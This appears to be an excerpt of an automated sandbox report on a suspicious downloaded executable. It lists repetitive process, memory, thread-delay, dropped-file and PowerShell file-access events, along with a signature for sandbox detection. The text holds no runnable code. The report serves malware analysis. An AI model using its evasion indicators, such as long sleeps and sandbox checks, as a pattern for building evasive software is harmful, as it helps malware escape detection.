Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}

Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 2860BB70000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 28625640000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 1AB9A940000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 1ABB4280000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 20CB7700000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 20CD1230000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 1F730440000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Memory allocated: 1F749F90000 memory reserve \| memory write watch

Source: C:\Users\user\Downloads\????\?????\20250108.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Downloads\????\?????\20250108.exe	Window / User API: threadDelayed 371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8047
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1806
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Window / User API: threadDelayed 1257
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Window / User API: threadDelayed 2006
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Window / User API: threadDelayed 3359
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Window / User API: threadDelayed 5446

Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\?????\20250108.exe	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\?????\l.dll	Jump to dropped file
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Dropped PE file which has not been started: C:\Users\Public\Documents\1.jpg	Jump to dropped file

Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6908	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 6796	Thread sleep count: 266 > 30
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960	Thread sleep count: 371 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep count: 8047 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep count: 1806 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1904	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960	Thread sleep count: 1257 > 30
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960	Thread sleep count: 2006 > 30
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960	Thread sleep count: 3359 > 30
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960	Thread sleep time: -33590s >= -30000s
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 364	Thread sleep count: 5446 > 30
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 364	Thread sleep time: -5446000s >= -30000s
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 4828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 6184	Thread sleep count: 238 > 30

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Downloads\????\?????\20250108.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Downloads\????\?????\20250108.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Memory allocated: page read and write | page guard

Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Queries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
